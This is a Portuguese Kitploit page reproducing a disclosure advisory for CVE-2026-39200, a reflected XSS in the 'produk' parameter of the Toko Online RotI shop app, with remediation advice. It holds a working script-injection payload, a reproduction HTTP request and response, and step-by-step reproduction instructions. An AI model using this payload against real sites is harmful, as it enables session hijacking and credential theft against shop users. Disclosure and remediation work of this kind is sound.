Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/r00tali/cve-2026-39200
Análise de VulnerabilidadesExploração de Aplicações WebSegurança WebTestes de PenetraçãoPapers e PesquisaAprendizado e Educação
GitHubr00tali/cve-2026-39200

CVE-2026-39200

Ver Repositório
13há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

O valor do parâmetro de requisição produk é copiado para o valor de um atributo de tag HTML que é encapsulado em aspas duplas. O payload xbnw0"><script>alert(1)</script>skc2h foi submetido no parâmetro produk. Esta entrada foi ecoada como xbnw0\"><script>alert(1)</script>skc2h na resposta da aplicação.

Compartilhar

CVE-2026-39200 — Cross-Site Scripting (XSS) Refletido no Toko Online RotI

Resumo

Uma vulnerabilidade de Cross-Site Scripting (XSS) refletido foi identificada no parâmetro de requisição produk da aplicação web Toko Online RotI. A aplicação não codifica em HTML a entrada fornecida pelo usuário antes de refleti-la dentro de um atributo de tag HTML que está encapsulado em aspas duplas. Um atacante pode criar uma URL maliciosa que, quando visitada por uma vítima, executa JavaScript arbitrário no contexto da sessão do navegador da vítima.

CampoValor
ID do CVECVE-2026-39200
Tipo de VulnerabilidadeCWE-79 — Neutralização Incorreta de Entrada Durante a Geração de Páginas Web (XSS Refletido)
Produto AfetadoToko Online RotI (loja online indonésia)
Parâmetro Afetadoproduk
DescobridorUzair Ali (r00tali) — Testador de Penetração / Caçador de Recompensas de Bugs
Data da Descoberta2026-07-03
CVE Atribuído2026-07-12
Advertência Publicada2026-07-19

Detalhes da Vulnerabilidade

O parâmetro de requisição produk é copiado literalmente para o valor de um atributo de tag HTML delimitado por aspas duplas. Como a aplicação não codifica em HTML a entrada fornecida pelo usuário antes de refleti-la, um atacante pode quebrar o atributo enviando um payload que contém uma aspa dupla de fechamento seguida de um payload HTML/JavaScript.

Payload de Prova de Conceito

root@kitploit:~
xbnw0"><script>alert(1)</script>skc2h

Quando este payload é enviado como o parâmetro produk, a aplicação ecoa a entrada de volta na resposta sem escape. O fechamento "> termina o atributo original, e o bloco injetado <script>alert(1)</script> é interpretado pelo navegador como um novo elemento HTML, executando JavaScript arbitrário na sessão do usuário.

Padrão Vulnerável (Conceitual)

A resposta HTML vulnerável se parece com isto:

root@kitploit:~
<!-- BEFORE injection -->
<input type="text" name="produk" value="USER_INPUT" />

<!-- AFTER injection with payload xbnw0"><script>alert(1)</script>skc2h -->
<input type="text" name="produk" value="xbnw0"><script>alert(1)</script>skc2h" />
                                                            ^^^^^^^^^^^^^^^^^^^^^^^^
                                                            Browser executes this

Requisição HTTP (Reprodução)

root@kitploit:~
GET /[vulnerable-endpoint]?produk=xbnw0%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3Eskc2h HTTP/1.1
Host: [target-host]
User-Agent: Mozilla/5.0

Resposta HTTP (Excerto)

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8

<html>
  <body>
    <!-- ... -->
    <input type="text" name="produk" value="xbnw0"><script>alert(1)</script>skc2h" />
    <!-- ... -->
  </body>
</html>

Passos para Reprodução

  1. Identifique um endpoint na aplicação Toko Online RotI que reflita o parâmetro produk dentro de um atributo HTML (ex.: uma página de busca, detalhe ou filtro de produtos).
  2. Substitua o valor do parâmetro produk pelo seguinte payload:
    root@kitploit:~
    xbnw0"><script>alert(1)</script>skc2h
    
  3. Envie a requisição ao servidor.
  4. Inspecione a resposta do servidor. O payload é ecoado de volta sem modificação dentro do atributo, quebrando a aspa " e produzindo um elemento <script> válido no DOM.
  5. Carregue a resposta criada em qualquer navegador moderno. Uma caixa de diálogo JavaScript alert(1) é exibida, confirmando a execução de JavaScript arbitrário na sessão da vítima.

Impacto

Uma exploração bem-sucedida deste XSS refletido permite que um atacante:

  • Roube cookies de sessão e tokens de autenticação, levando à tomada de conta.
  • Execute ações em nome de usuários autenticados sem o conhecimento deles.
  • Redirecione usuários para sites maliciosos (phishing / coleta de credenciais).
  • Injete conteúdo malicioso na aplicação (desfiguração).
  • Capture teclas digitadas e dados de formulário submetidos pela vítima.
  • Explore vulnerabilidades do navegador para entrega de malware drive-by.
  • Abuse da relação de confiança entre o usuário e o domínio da aplicação.

Como a vulnerabilidade é refletida, a exploração requer apenas que uma vítima clique em um link criado, tornando-a trivialmente arma em campanhas de phishing.

CVSS v3.1 (estimado): 6.1 (Médio) — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N


Remediação

Para remediar esta vulnerabilidade, o fornecedor deve:

  1. Codificar em HTML todos os valores fornecidos pelo usuário antes que sejam refletidos na saída HTML. Especificamente codificar <, >, ", ' e & (ex.: &lt;, &gt;, &quot;, &#x27;, &amp;).
  2. Usar os auxiliares de codificação de saída integrados do framework em vez de concatenação manual. Exemplos:
    • PHP: htmlspecialchars($input, ENT_QUOTES, 'UTF-8')
    • ASP.NET: HttpUtility.HtmlEncode(input) ou sintaxe <%: %>
    • Python (Jinja2): {{ input }} (escape automático por padrão)
  3. Definir um cabeçalho de resposta Content-Security-Policy (CSP) estrito para limitar o impacto de qualquer injeção remanescente:
    root@kitploit:~
    Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
    
  4. Definir as flags HttpOnly e Secure em todos os cookies de sessão para impedir que o JavaScript os leia.
  5. Validar o parâmetro produk contra uma lista de permissões de identificadores de produto esperados (IDs numéricos, slugs, etc.) e rejeitar qualquer coisa que não corresponda.
  6. Adicionar X-Content-Type-Options: nosniff para evitar a detecção de tipo MIME dos corpos de resposta.

Cronograma de Divulgação

DataEvento
2026-07-03Vulnerabilidade descoberta durante teste de segurança autorizado
2026-07-03ID do CVE solicitado ao MITRE via cveform.mitre.org
2026-07-12CVE-2026-39200 atribuído pela Equipe de Atribuição do MITRE
2026-07-19Advertência pública publicada

Descobridor

Uzair Ali (r00tali) — Testador de Penetração / Caçador de Recompensas de Bugs / Pesquisador de Segurança

  • GitHub: https://github.com/r00tali

Referências

  • OWASP — Cross-Site Scripting (XSS)
  • CWE-79: Neutralização Incorreta de Entrada Durante a Geração de Páginas Web
  • PortSwigger — XSS Refletido
  • Registro CVE do MITRE — CVE-2026-39200

Aviso Legal

Esta advertência é publicada apenas para fins educacionais e defensivos. A vulnerabilidade foi relatada através do processo de divulgação responsável via Equipe de Atribuição CVE do MITRE. Nenhuma informação confidencial do fornecedor, dados de clientes ou código proprietário é divulgada. A prova de conceito usa um payload benigno alert(1) e tem a intenção de demonstrar a existência do bug, não de facilitar ataques contra o serviço ativo.

Baixar ferramenta